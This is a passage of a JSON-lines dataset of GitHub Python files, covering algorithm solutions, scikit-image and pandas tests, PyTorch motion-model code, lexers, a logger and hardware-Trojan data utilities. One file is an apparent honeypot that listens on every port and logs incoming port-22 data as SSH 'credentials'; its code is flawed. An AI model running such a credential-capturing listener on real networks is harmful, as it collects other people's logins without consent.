Base(exchange,symbol,conn,allstate,plus=_plus)\n\t\tpp.account_money(float(0.0))\n\t\tpp.new_price(one['_time']+TimeStamp,one['point'],one['price'])\n\t\tpp.get_result()\n\tcnt+=1\n\ttime.sleep(1)","repo_name":"rlcjj/web_ctp-1","sub_path":"py/rebuild.py","file_name":"rebuild.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"8428607571","text":"\"\"\"\nFirst made sure I understand what a minimum spanning tree even is.\nThe classical method seems to use Union-Find,\nso try Prim's algorithm, which can be written with a priority queue.\n\n6 9\n0 1 1\n0 2 3\n1 2 1\n1 3 7\n2 4 1\n1 4 3\n3 4 1\n3 5 1\n4 5 6\n5 <-- output the total weight of the MST edges on a single line\n\"\"\"\nimport heapq\n\ndef main():\n    V,E = map(int,input().split())\n    G = [[] for _ in range(V)]\n    \n    for _ in range(E):\n        u,v,c = map(int,input().split())\n        G[u].append((v,c))\n        G[v].append((u,c))\n    \n    used=[0]*V\n    used[0]=1\n    que = [(c,u) for u,c in G[0]]\n    heapq.heapify(que)\n\n    ans = 0\n    while que:\n        cv,v = heapq.heappop(que)\n        if used[v]:\n            continue\n        used[v]=1\n        ans+=cv\n        for k,c in G[v]:\n            if used[k]:\n                continue\n            heapq.heappush(que,(c,k))\n    print(ans)\n\nif __name__==\"__main__\":\n    
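# read V, E and the edge list from stdin, then run Prim's algorithm\n    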
main()\n","repo_name":"tharashi10/algorithm","sub_path":"atcoder/Bootcamp/64_SpanningTree.py","file_name":"64_SpanningTree.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"27848546090","text":"import logging\nimport logging.handlers\nimport sys\n\nfrom socketserver import TCPServer, ThreadingTCPServer\n\nlogger = logging.getLogger(\"port-listener\")\nlogger.setLevel(logging.INFO)\n\n# Log to syslog\nsyslog_handler = logging.handlers.SysLogHandler()\nsyslog_formatter = logging.Formatter(\"%(name)s: %(message)s\")\nsyslog_handler.setFormatter(syslog_formatter)\nlogger.addHandler(syslog_handler)\n\n# Log to file\nfile_handler = logging.FileHandler(\"ssh_credentials.log\")\nfile_formatter = logging.Formatter(\"%(asctime)s: %(message)s\")\nfile_handler.setFormatter(file_formatter)\nlogger.addHandler(file_handler)\n\n\nclass PortListener(ThreadingTCPServer):\n    def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):\n        super().__init__(server_address, RequestHandlerClass, bind_and_activate)\n\n    def handle_request(self):\n        logger.info(f\"Connection from {self.client_address} on port {self.server_address[1]}\")\n        if self.server_address[1] == 22:\n            # Log credentials from SSH connections\n            logger.info(f\"Credentials: {self.request.recv(1024).decode()}\")\n        super().handle_request()\n\n\nif __name__ == \"__main__\":\n    # Listen on all common ports\n    for port in range(1, 65535):\n        try:\n            server = PortListener((\"0.0.0.0\", port), TCPServer)\n        except OSError:\n            continue\n        else:\n            server.serve_forever()\n","repo_name":"spicy-bear/honeypot","sub_path":"listen2.py","file_name":"listen2.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28548825624","text":"import os\nimport os.path\nimport numpy as np\nfrom numpy.testing import *\nfrom numpy.testing.decorators import skipif\n\nfrom tempfile import NamedTemporaryFile\n\nfrom skimage import data_dir\nfrom skimage.io import imread, imsave, use_plugin, reset_plugins\nimport skimage.io as sio\n\ntry:\n    import imread as _imread\nexcept ImportError:\n    imread_available = False\nelse:\n    imread_available = True\n\n\ndef setup():\n    if imread_available:\n        np.random.seed(0)\n        use_plugin('imread')\n\n\ndef teardown():\n    reset_plugins()\n\n\n@skipif(not imread_available)\ndef test_imread_flatten():\n    # a color image is flattened\n    img = imread(os.path.join(data_dir, 'color.png'), flatten=True)\n    assert img.ndim == 2\n    assert img.dtype == np.float64\n    img = imread(os.path.join(data_dir, 'camera.png'), flatten=True)\n    # check that flattening does not occur for an image that is grey already.\n    assert np.sctype2char(img.dtype) in np.typecodes['AllInteger']\n\n\n@skipif(not imread_available)\ndef test_imread_palette():\n    img = imread(os.path.join(data_dir, 'palette_color.png'))\n    assert img.ndim == 3\n\n\n@skipif(not imread_available)\ndef test_imread_truncated_jpg():\n    assert_raises((RuntimeError, ValueError),\n                  sio.imread,\n                  os.path.join(data_dir, 'truncated.jpg'))\n\n\n@skipif(not imread_available)\ndef test_bilevel():\n    expected = np.zeros((10, 10), bool)\n    expected[::2] = 1\n\n    img = imread(os.path.join(data_dir, 'checker_bilevel.png'))\n    assert_array_equal(img.astype(bool), expected)\n\n\nclass TestSave:\n    def roundtrip(self, x, scaling=1):\n        f = NamedTemporaryFile(suffix='.png')\n        fname = f.name\n        f.close()\n        imsave(fname, x)\n        y = imread(fname)\n\n        
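# the image read back from disk should match the original once scaling is applied\n        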
assert_array_almost_equal((x * scaling).astype(np.int32), y)\n\n @skipif(not imread_available)\n def test_imsave_roundtrip(self):\n dtype = np.uint8\n for shape in [(10, 10), (10, 10, 3), (10, 10, 4)]:\n x = np.ones(shape, dtype=dtype) * np.random.rand(*shape)\n\n if np.issubdtype(dtype, float):\n yield self.roundtrip, x, 255\n else:\n x = (x * 255).astype(dtype)\n yield self.roundtrip, x\n\nif __name__ == \"__main__\":\n run_module_suite()\n","repo_name":"jeetmehta/Lung-Cancer-Classification","sub_path":"syde-522-env/lib/python2.7/site-packages/skimage/io/tests/test_imread.py","file_name":"test_imread.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"37"} +{"seq_id":"37658846964","text":"import pandas as pd\nimport os\nfrom src.etl.load_file import save_datafame_to_jsonl_file\n\ndef test_save_data_converts_pandas_df_to_jsonl_and_saves_file():\n test_file_path = \"./test_save.jsonl\"\n test_df = pd.DataFrame({\"test\":[1,2,3], \"data\": [\"one\", \"two\", \"three\"]})\n\n save_datafame_to_jsonl_file(test_df, test_file_path)\n\n assert os.path.isfile(test_file_path)\n with open(test_file_path, \"r\") as file:\n lines = [line for line in file]\n assert '{\"test\":1,\"data\":\"one\"}\\n' == lines[0]\n assert '{\"test\":2,\"data\":\"two\"}\\n' == lines[1]\n assert '{\"test\":3,\"data\":\"three\"}\\n' == lines[2]\n os.remove(test_file_path)","repo_name":"Josh-Robson/python-project","sub_path":"tests/test_methods/test_save_data.py","file_name":"test_save_data.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18636476901","text":"class Solution:\n def isIsomorphic(self, s: str, t: str) -> bool:\n replace = dict()\n for i, c in enumerate(s):\n r = replace.get(c, None)\n if r and t[i] != r:\n return False\n if t[i] in replace.values() and r != t[i]:\n return False\n replace[c] = t[i]\n return True","repo_name":"Mihir-1/LeetCode-Algorithms","sub_path":"0205-isomorphic-strings/0205-isomorphic-strings.py","file_name":"0205-isomorphic-strings.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16219807737","text":"import math\nimport random\n\nimport torch\nfrom torch import nn\n\n\nclass PosEncoding(nn.Module):\n def positional_encoding(self,tta, basis=10000., dimensions=256):\n z = torch.zeros(dimensions, device='cuda') # .type(torch.float16)\n indices = torch.arange(0, dimensions, 2, device='cuda').type(torch.float32)\n z[indices.long()] = torch.sin(tta / torch.pow(basis, indices / dimensions))\n z[indices.long() + 1] = torch.cos(tta / torch.pow(basis, indices / dimensions))\n return z\n def __init__(self,max_tta,dims):\n super(PosEncoding, self).__init__()\n ttaEncoding = torch.empty(max_tta, dims)\n for tta in range(max_tta):\n ttaEncoding[tta] = self.positional_encoding(tta,basis=10000.,dimensions=dims)\n self.register_buffer(\"ttaEncoding\", ttaEncoding)\n def forward(self,id):\n return self.ttaEncoding[id]\ndef add_pos_info(latent,embedings,tta,t_max):\n t = min(tta, t_max)\n pos = embedings(t)\n #pos = torch.cat((pos,pos,pos),dim=-1)\n return latent+pos\n\ndef multi_concat(context_state,context_offset,context_target,embeddings,embeddings512,noise_per_sequence,tta,t_max):\n t = torch.where(tta < t_max, tta, t_max)\n embeddings_vector = []\n embeddings512_vector = []\n for i in range(t.shape[0]):\n 
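# look up the positional encoding for each sequence's tta (already clamped to t_max)\n        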
embeddings_vector.append(embeddings(t[i]).view(1,1,-1))\n embeddings512_vector.append(embeddings512(t[i]).view(1,1,-1))\n embeddings_vector = torch.cat(embeddings_vector,dim=1) # 1, 8 ,256\n embeddings512_vector = torch.cat(embeddings512_vector,dim=1)\n h_target = context_target + embeddings_vector\n h_state = context_state + embeddings512_vector\n h_offset = context_offset + embeddings_vector\n\n lambda_tar = torch.where(t>30,1.,torch.where(t<5.,0,(t-5.)/25.))\n # if tta >= 30:\n # lambda_tar = 1.\n # elif tta < 5:\n # lambda_tar = 0.\n # else:\n # lambda_tar = (tta - 5.) / 25.\n h_target = torch.cat((h_offset, h_target), dim=-1)\n h_target = h_target + lambda_tar.view(1,-1,1) * noise_per_sequence.unsqueeze(1)\n\n return torch.cat((h_state, h_target), dim=-1), h_target\ndef concat(context_state,context_offset,context_target,embeddings,embeddings512,noise_per_sequence,tta,t_max):\n# t = torch.min(tta,t_max) # MAXFRAME+10-5\n t = min(tta,t_max)\n h_target = context_target + embeddings(t)\n h_state = context_state + embeddings512(t)\n h_offset = context_offset + embeddings(t)\n if tta >= 30:\n lambda_tar = 1.\n elif tta < 5:\n lambda_tar = 0.\n else:\n lambda_tar = (tta - 5.) / 25.\n h_target = torch.cat((h_offset, h_target), dim=-1)\n h_target = h_target + lambda_tar * noise_per_sequence\n\n return torch.cat((h_state,h_target),dim=-1),h_target\n\nclass SeqScheduler():\n def __init__(self,initial_seq,max_seq):\n self.initial_seq = initial_seq\n self.max_seq = max_seq\n # self.epoch = epoch\n def progress(self,t:float):\n t = min(max(t,0.),1.)\n out = (self.max_seq-self.initial_seq)*t+self.initial_seq\n return int(out)\n def range(self,t:float):\n upper = self.progress(t)\n return random.randint(self.initial_seq,upper)\n\nclass ATNBlock(nn.Module):\n def __init__(self,content_dims,style_dims):\n super(ATNBlock, self).__init__()\n in_ch = content_dims\n self.in_ch = content_dims\n self.sty_ch = style_dims\n self.f = nn.Linear(content_dims, style_dims)\n self.g = nn.Linear(style_dims, style_dims)\n self.h = nn.Linear(style_dims, style_dims)\n self.sm = nn.Softmax(dim=-2)\n self.k = nn.Linear(style_dims, in_ch)\n self.norm = nn.InstanceNorm2d(style_dims,affine=False)\n self.norm_content = nn.InstanceNorm1d(content_dims,affine=False) #LayerNorm(keep the same as AdaIn)\n # self.s = []\n def forward(self, fs, fd,pos, first):\n #return fd\n N,T,C = fs.shape\n N,C = fd.shape\n x = fd\n s_sty = fs\n # N,C : fd.shape\n # N,C,T : fs.shape\n b = s_sty.shape[0]\n\n F = self.f(self.norm_content(x)).unsqueeze(-1) # N,C,1\n if(first):\n G = self.g(self.norm(s_sty)) #N,T,C\n self.G = G.view(b, -1, self.sty_ch) # N,T,C\n #s_sty_pos = s_sty+pos_embedding.view(1,C,1)\n self.H = self.h(s_sty).transpose(1,2) #N,C,T\n #H = H.view(b, self.sty_ch, -1) # N,C,T\n\n\n F = F.view(b, self.sty_ch, -1) #N,C,1\n\n S = torch.bmm(self.G,F) #N,T,1\n\n S = self.sm(S/math.sqrt(self.G.shape[-1]))\n # self.s.append(S)\n O = torch.bmm(self.H, S) # N,C,1\n\n O = O.view(x.shape[:-1]+(self.sty_ch,))\n\n O = self.k(O)\n O += x\n return O\n\nclass AdaInNorm2D(nn.Module):\n r\"\"\"MLP(fs.mean(),fs.std()) -> instanceNorm(fd)\"\"\"\n def __init__(self,style_dims,content_dim,n_joints=0):\n\n super(AdaInNorm2D, self).__init__()\n\n self.affine2 = nn.Linear(style_dims, style_dims)\n self.act = nn.ELU()#nn.LeakyReLU(0.2)\n self.affine3 = nn.Linear(style_dims, style_dims)\n self.affine4 = nn.Linear(style_dims, content_dim * 2)\n self.norm = nn.InstanceNorm1d(512)\n self.dropout = nn.Dropout(0.1)\n\n def forward(self, s, d ,pos_emedding,first):\n 
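\"\"\"On the first call derive AdaIN gamma/beta from the style s, then apply them to the normalized d.\"\"\"\n        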
if(first):\n N,T,C = s.shape\n s = torch.mean(s,dim=1) #N,C\n s = self.affine2(s)\n s = self.act(s)\n s = self.dropout(s)\n s = self.affine4(s)\n self.gamma, self.beta = torch.chunk(s, chunks=2, dim=1)\n\n d = self.norm(d)\n return (1 + self.gamma) * d + self.beta\n","repo_name":"yuyujunjun/RSMT-Realtime-Stylized-Motion-Transition","sub_path":"src/Net/TransitionNet.py","file_name":"TransitionNet.py","file_ext":"py","file_size_in_byte":5609,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"37"} +{"seq_id":"71137769706","text":"#Zachary Robin\n#CSCI 169\n#Programming HW2 \n#Part 1\ndef fun(x,y):\n z=x+y\n print(z)\n return z\nfun(1,2)\nfun(\"hi\",\"there\")\n\n#Part 2\ndef report(xs):\n #y will keep track of the number of students \n #z will keep track of the score \n #q will hold the string of names\n y = 0\n z=0\n q= xs[1]\n for x in xs:\n for x in xs:\n if(type(x)==int):\n y = y +1\n z = z + x\n if (x-1):\n if(type(x-1) == int):\n q = \", \" + str(x)\n\n print(q + \"averaged: \" + str(z/y))\nreport([\"Jill\", \"Johnson\", 87, \"Billy\", \"Ray\", \"Cyrus\", 78, \"Rita\", \"Yeats\", \"Bobbie\", \"Sue\", \"Palmer\", 72])\n\n#Part 3\n#A simple print function \ndef printfun(x):\n for i in x:\n print(str(i) + \" \")\n print()\n\n#The partition function \ndef partition(input, p, r):\n pivot = input[r]\n while p pivot:\n r = r-1\n if input[p] == input[r]:\n p = p+1\n elif p 100:\n break\n\ndataframe = {'UserName': Usernames, 'TimeStamps': TimeStamps, 'Tweets': Tweets, 'Replies': Replies, 'Retweets': Retweets, 'Likes': Likes,}\ndf = pd.DataFrame(dataframe)\ndf.to_csv('InfoSec.csv')\ndata = pd.read_csv('InfoSec.csv')\ntweets = data['Tweets'].astype(str)\nprint(\"|======== ======== ======== ======== RESULTS ======== ======== ======== ========|\" )\nfor tweet in tweets:\n print(predict([tweet]),\",\"+tweet)\n","repo_name":"NoDataFound/BMIS","sub_path":"bmis.py","file_name":"bmis.py","file_ext":"py","file_size_in_byte":4348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"8397836661","text":"from pygments.lexer import RegexLexer, words, re\nfrom pygments.token import Text, Operator, Keyword, Name, Comment\n\n__all__ = ['RoboconfGraphLexer', 'RoboconfInstancesLexer']\n\n\nclass RoboconfGraphLexer(RegexLexer):\n \"\"\"\n Lexer for `Roboconf `_ graph files.\n\n .. versionadded:: 2.1\n \"\"\"\n name = 'Roboconf Graph'\n aliases = ['roboconf-graph']\n filenames = ['*.graph']\n\n flags = re.IGNORECASE | re.MULTILINE\n tokens = {\n 'root': [\n # Skip white spaces\n (r'\\s+', Text),\n\n # There is one operator\n (r'=', Operator),\n\n # Keywords\n (words(('facet', 'import'), suffix=r'\\s*\\b', prefix=r'\\b'), Keyword),\n (words((\n 'installer', 'extends', 'exports', 'imports', 'facets',\n 'children'), suffix=r'\\s*:?', prefix=r'\\b'), Name),\n\n # Comments\n (r'#.*\\n', Comment),\n\n # Default\n (r'[^#]', Text),\n (r'.*\\n', Text)\n ]\n }\n\n\nclass RoboconfInstancesLexer(RegexLexer):\n \"\"\"\n Lexer for `Roboconf `_ instances files.\n\n .. 
versionadded:: 2.1\n \"\"\"\n name = 'Roboconf Instances'\n aliases = ['roboconf-instances']\n filenames = ['*.instances']\n\n flags = re.IGNORECASE | re.MULTILINE\n tokens = {\n 'root': [\n\n # Skip white spaces\n (r'\\s+', Text),\n\n # Keywords\n (words(('instance of', 'import'), suffix=r'\\s*\\b', prefix=r'\\b'), Keyword),\n (words(('name', 'count'), suffix=r's*:?', prefix=r'\\b'), Name),\n (r'\\s*[\\w.-]+\\s*:', Name),\n\n # Comments\n (r'#.*\\n', Comment),\n\n # Default\n (r'[^#]', Text),\n (r'.*\\n', Text)\n ]\n }\n","repo_name":"wandb/wandb","sub_path":"wandb/vendor/pygments/lexers/roboconf.py","file_name":"roboconf.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"28945393432","text":"import cv2\nimport datetime\nimport numpy as np\nimport torch\nimport os\nfrom torch.utils.tensorboard import SummaryWriter\nfrom pytorch3d.io import save_obj\nfrom shutil import copyfile\n\nclass Loggers:\n loggers = {}\n metrics = {}\n exp_name = \"\"\n path = \"\"\n time=\"\"\n vis=True\n def __init__(self) -> None:\n pass\n\n def init(self, exp_name=\"experiment\",path=\"/mnt/HDD/exp_log\", show=False, debug=False):\n self.time = f'{datetime.datetime.now():%d-%b-%y-%H-%M-%S}'\n self.exp_name=exp_name\n self.prefix = path\n self.path = os.path.join(self.prefix, self.exp_name, self.time)\n self.show = show\n self.debug=debug\n os.makedirs(self.path,exist_ok=True)\n self.core_logger = SummaryWriter(log_dir = self.path)\n\n def add_image(self, name, content = None, step=0, type = \"video\", flip=True):\n if torch.is_tensor(content):\n content = content.detach().cpu().numpy()\n \n if flip:\n content = cv2.flip(content, 0)\n\n if len(content.shape) == 3:\n content = content[..., :3]\n \n content = np.clip(content,0,1)\n content = (content*255).astype(np.uint8)\n\n if content.shape[-1]==3:\n content = cv2.cvtColor(content, cv2.COLOR_BGR2RGB)\n \n content = cv2.resize(content,(512,512)) \n if type == \"video\":\n if name not in self.loggers:\n fourcc = cv2.VideoWriter_fourcc(*'mp4v')\n color = True\n if len(content.shape) == 2 or content.shape[2] == 1:\n color = False\n self.loggers[name] = cv2.VideoWriter(\n os.path.join(self.path, name.replace(\" \", \"_\") + \".mp4\"),\n fourcc, 60.0,\n (content.shape[1], content.shape[0]),\n color\n )\n writer = self.loggers[name]\n writer.write(content)\n \n if self.show:\n try:\n content = cv2.resize(content,(512,512))\n cv2.imshow(name,content)\n cv2.waitKey(1)\n except:\n print(\"visualization failed. 
if you don't have a screen, don't turn show option on\")\n if len(content.shape)==2:\n content = content[...,None]\n \n #self.core_logger.add_image(name, content, dataformats = \"HWC\", global_step = step)\n \n def save_config(self, task):\n f = open(os.path.join(self.path, \"config.py\"), 'w')\n f.write(str(task))\n f.close()\n \n def save_file(self, file):\n copyfile(file, os.path.join(self.path, file.split(\"/\")[-1]))\n \n \n def save_txt(self, name, arr):\n np.savetxt(os.path.join(self.path,name),arr)\n \n def save_npy(self, name, arr):\n np.save(os.path.join(self.path,name),arr)\n \n def save_img(self, name, img, flip=True):\n img = img.astype(np.float32)\n img = img[...,:3]\n if img.shape[-1]==3:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n if flip:\n img = cv2.flip(img, 0)\n \n img = (np.clip(img,0,1)*255).astype(np.uint8)\n img = cv2.resize(img,(512,512),interpolation=cv2.INTER_NEAREST)\n cv2.imwrite(os.path.join(self.path,name),img)\n\n def step(self, stop = False):\n if self.debug or stop:\n cv2.waitKey(0)\n else:\n cv2.waitKey(1)\n return\n \n def mark(self):\n open(os.path.join(self.path, \"success\"), 'w')\n \n def clean(self):\n for k, v in self.loggers.items():\n v.release()\n cv2.destroyAllWindows()\n self.loggers={}\n \n def exit(self):\n print(\"exit\")\n self.core_logger.close()\n self.clean()\n for k,v in self.metrics.items():\n np.savetxt(os.path.join(self.path,k+\".txt\"),np.array(v))\n\n def show_metric(self):\n for k,v in self.metrics.items():\n print(k,np.average(np.array(v)))\n \n def ret_metric(self):\n return self.metrics\n \n def add_scalar(self, label: str, x, y):\n self.core_logger.add_scalar(label, x, y)\n\n def add_metric(self, label, x):\n if label not in self.metrics:\n self.metrics[label]=[]\n self.metrics[label].append(x)\n\n def add_video(self, label: str, vid: torch.Tensor):\n \"\"\" The shape of vid should be (T, H, W, 3)\n \"\"\"\n self.core_logger.add_video(label, vid.reshape([1, *vid.size()]))\n\n def add_mesh(self, label: str, vertice, color, face, step):\n \"\"\" The shape of these tensors should be (N, 3)\n \"\"\"\n self.core_logger.add_mesh(\n label,\n vertice.reshape([1, *vertice.size()]) if vertice is not None else None,\n color.reshape([1, *color.size()]) if color is not None else None,\n face.reshape([1, *face.size()]) if face is not None else None,\n global_step = step\n )\n \n def save_scene(self,scene,name):\n path = os.path.join(self.path,name)\n os.makedirs(path,exist_ok=True)\n #return\n for id,meshinfo in enumerate(scene[\"meshes\"]):\n verts,faces = meshinfo[\"model\"].get_mesh_verts_faces(0)\n try:\n verts_uv = meshinfo[\"model\"].textures.verts_uvs_list()[0]\n faces_uv = meshinfo[\"model\"].textures.faces_uvs_list()[0]\n tex = meshinfo[\"model\"].textures.maps_padded()[0]\n save_obj(os.path.join(path,str(id)+\".obj\"),verts,faces,verts_uvs=verts_uv,faces_uvs=faces_uv,texture_map=tex)\n except:\n print(\"no texture save\")\n save_obj(os.path.join(path,str(id)+\".obj\"),verts,faces)\n\n\n\nLogger = Loggers()","repo_name":"jkxing/DROT","sub_path":"experiments/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":5757,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"37"} +{"seq_id":"19531703616","text":"import os, platform,csv,re\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom pathlib import Path\r\n\r\ndef _fix_the_path_for_the_os(d):\r\n if platform.system() != 'Windows':\r\n if '/mnt/NAS/Members/root/' not in d:\r\n d = '/mnt/NAS/Members/root/' + d\r\n 
else:\r\n        if 'Y:/' not in d:\r\n            d = 'Y:/' + d\r\n    return d\r\n\r\n\r\ndef _get_immediate_subdirectories(a_dir):\r\n    return [name for name in os.listdir(a_dir)\r\n            if os.path.isdir(os.path.join(a_dir, name))]\r\n\r\n\r\ndef _get_immediate_subdirectories_and_set_of_types(a_dir):\r\n    list_of_folders = _get_immediate_subdirectories(a_dir)\r\n    if 'not valid' in list_of_folders:\r\n        list_of_folders.remove('not valid')\r\n    types = []\r\n    for f in list_of_folders:\r\n        types.append(f.split('_')[0])\r\n\r\n    types = set(types)\r\n    return list_of_folders, types\r\n\r\n\r\ndef _atoi(text):\r\n    return int(text) if text.isdigit() else text\r\n\r\n\r\ndef _natural_keys(text):\r\n    return [_atoi(c) for c in re.split(r'(\\d+)', text) ]\r\n\r\n\r\ndef _get_csv_files_sorted_list(a_dir):\r\n    l = [a_dir + name for name in os.listdir(a_dir) if name.endswith('.csv')]\r\n    l.sort(key=_natural_keys)\r\n    return l\r\n\r\n\r\ndef get_list_of_files_HT(dir2bms_folder='HT_Data/AES_withTrojan_Set1/',\r\n                         name_bms=['AES-T400'], folder_numbers=[1], with_anomaly_data= False):\r\n    dir2bms_folder = _fix_the_path_for_the_os(dir2bms_folder)\r\n    dirs_to_files = []\r\n    for name_bm in name_bms:\r\n        list_of_folders, types = _get_immediate_subdirectories_and_set_of_types(dir2bms_folder + name_bm)\r\n        for className in types:\r\n            if (not with_anomaly_data and 'Disabled' in className)or (with_anomaly_data and 'Triggered' in className):\r\n                for folder_number in folder_numbers:\r\n                    folder_name = className + '_' + str(folder_number)\r\n                    dir2data = dir2bms_folder + name_bm + '/' + folder_name + '/' + folder_name + '/'\r\n                    print(dir2data)\r\n                    sample_names = _get_csv_files_sorted_list(dir2data)\r\n                    for sample_name in sample_names:\r\n                        dirs_to_files.append(sample_name)\r\n\r\n    return dirs_to_files\r\n\r\n\r\n\r\ndef INITIALIZE(func):\r\n    setattr(func,\"sample_number\",0)\r\n    setattr(func,\"second\",0)\r\n    setattr(func,\"minute\",0)\r\n    setattr(func,\"hour\",0)\r\n    setattr(func,\"day\",1)\r\n    setattr(func,\"month\",1)\r\n    setattr(func,\"year\",2019)\r\n    return func\r\n\r\n\"\"\"\r\nmy_clock() is a tick-based clock; with every tick it increments the sample_number variable and so on\r\n\"\"\"\r\n@INITIALIZE\r\ndef my_clock():\r\n\r\n    month_names = ['January','February','March','April','May','June','July','August','September','October','November','December']\r\n    month_days = [31,28,31,30,31,30,31,31,30,31,30,31]\r\n\r\n    my_clock.sample_number = my_clock.sample_number + 1\r\n    #print(my_clock.sample_number)\r\n    if my_clock.sample_number == 1:\r\n        my_clock.sample_number = 0\r\n        my_clock.second = my_clock.second + 1\r\n        #print('second',my_clock.second)\r\n\r\n    if my_clock.second == 60:\r\n        my_clock.second = 0\r\n        my_clock.minute = my_clock.minute + 1\r\n        #print('minute',my_clock.minute)\r\n\r\n    if my_clock.minute == 60:\r\n        my_clock.minute = 0\r\n        my_clock.hour = my_clock.hour + 1\r\n        print('hour',my_clock.hour)\r\n\r\n    if my_clock.hour == 24:\r\n        my_clock.hour = 0\r\n        my_clock.day = my_clock.day + 1\r\n        print('day',my_clock.day)\r\n\r\n    if (my_clock.day == (month_days [my_clock.month-1]+1)):\r\n        my_clock.day = 1\r\n        my_clock.month = my_clock.month + 1\r\n        print('month',my_clock.month)\r\n        #exit()\r\n\r\n    if (my_clock.month == 13):\r\n        my_clock.month = 1\r\n        my_clock.year = my_clock.year + 1\r\n        print('year',my_clock.year)\r\n\r\n    str_year = str(my_clock.year)\r\n\r\n    if my_clock.month < 10:\r\n        str_month = '0'+str(my_clock.month)\r\n    elif my_clock.month >= 10:\r\n        str_month = str(my_clock.month)\r\n\r\n    if my_clock.day < 10:\r\n        str_day = 
'0'+str(my_clock.day)\r\n elif my_clock.day >= 10:\r\n str_day = str(my_clock.day)\r\n\r\n if my_clock.hour < 10:\r\n str_hour = '0'+str(my_clock.hour)\r\n elif my_clock.hour >= 10:\r\n str_hour = str(my_clock.hour)\r\n\r\n if my_clock.minute < 10:\r\n str_minute = '0'+str(my_clock.minute)\r\n elif my_clock.minute >= 10:\r\n str_minute = str(my_clock.minute)\r\n\r\n if my_clock.second < 10:\r\n str_second = '0'+str(my_clock.second)\r\n elif my_clock.second >= 10:\r\n str_second = str(my_clock.second)\r\n\r\n return str_month + '/' + str_day + '/' + str_year + ' ' + str_hour + ':' + str_minute + ':' + str_second\r\n\r\n\r\ndef _merge(start_range=101, sample_no=4, output_file_name='\"./combined_HT-free.csv\"',\r\n dir2bms_folder='HT_Data/AES_withTrojan_Set1/',\r\n name_bms=['AES-T400'], folder_numbers=[1], with_anomaly_data=False):\r\n file_names = get_list_of_files_HT(dir2bms_folder,name_bms, folder_numbers, with_anomaly_data)\r\n file_names = file_names[start_range:start_range + sample_no]\r\n print(file_names)\r\n for file_name in file_names:\r\n with open(file_name) as original_file:\r\n original_file_reader = csv.reader(original_file, delimiter=',')\r\n with open(output_file_name,'a',newline='') as new_file:\r\n writer = csv.writer(new_file, delimiter=',')\r\n for row in original_file_reader:\r\n writer.writerow([float(row[0])])\r\n\r\n\r\ndef add_timestamp_csv(input_file_name, output_file_name):\r\n with open(input_file_name) as old_file:\r\n old_file_object = csv.reader(old_file, delimiter=',')\r\n add_row=['timestamp','value']\r\n with open(output_file_name,'w',newline='') as new_file:\r\n new_file_object = csv.writer(new_file, delimiter=',')\r\n new_file_object.writerow(add_row)\r\n time = '01/01/2019 00:00:00'\r\n tick = 0\r\n #row_number = 0\r\n for row in old_file_object:\r\n if 'timestamp' not in row:\r\n time = my_clock()\r\n add_row = [time, row[0]]\r\n new_file_object.writerow(add_row)\r\n\r\n\r\ndef merge_samples(dir2bms_folder,name_bms,\r\n uninfected_start_range=1,uninfected_samples_no=10, infected_start_range=1,infected_samples_no=10,\r\n combined_file_name='./combined_HT.csv',\r\n ht_free_file_name=\"./combined_HT-free.csv\",\r\n ht_infected_file_name = \"./combined_HT-infected.csv\",\r\n two_seperate_files=True,\r\n folder_numbers=[1]):\r\n\r\n if not two_seperate_files:\r\n ht_free_file_name, ht_infected_file_name = combined_file_name, combined_file_name\r\n\r\n for output_file_name in [combined_file_name,ht_free_file_name,ht_infected_file_name]:\r\n try:\r\n os.remove(output_file_name)\r\n print(output_file_name+' DELETED')\r\n except:\r\n print(output_file_name+' NOT PRESENT')\r\n\r\n # merge_uninfected_csv\r\n _merge(start_range=uninfected_start_range, sample_no=uninfected_samples_no, output_file_name=ht_free_file_name,\r\n with_anomaly_data=False,dir2bms_folder=dir2bms_folder, name_bms=name_bms, folder_numbers=folder_numbers)\r\n # merge_infected_csv\r\n _merge(start_range=infected_start_range, sample_no=infected_samples_no, output_file_name=ht_infected_file_name,\r\n with_anomaly_data=True,dir2bms_folder=dir2bms_folder, name_bms=name_bms, folder_numbers=folder_numbers)\r\n\r\n for file_name in set([ht_free_file_name,ht_infected_file_name]):\r\n add_timestamp_csv(file_name,'tmp.csv')\r\n os.remove(file_name)\r\n os.rename('tmp.csv',file_name)\r\n\r\n\r\ndef _add_noise_single_file(input_file,output_file, mu, sigma):\r\n clean_signal = pd.read_csv(input_file)\r\n noise = np.random.normal(mu, sigma, clean_signal.shape)\r\n noisy_signal = clean_signal + noise\r\n 
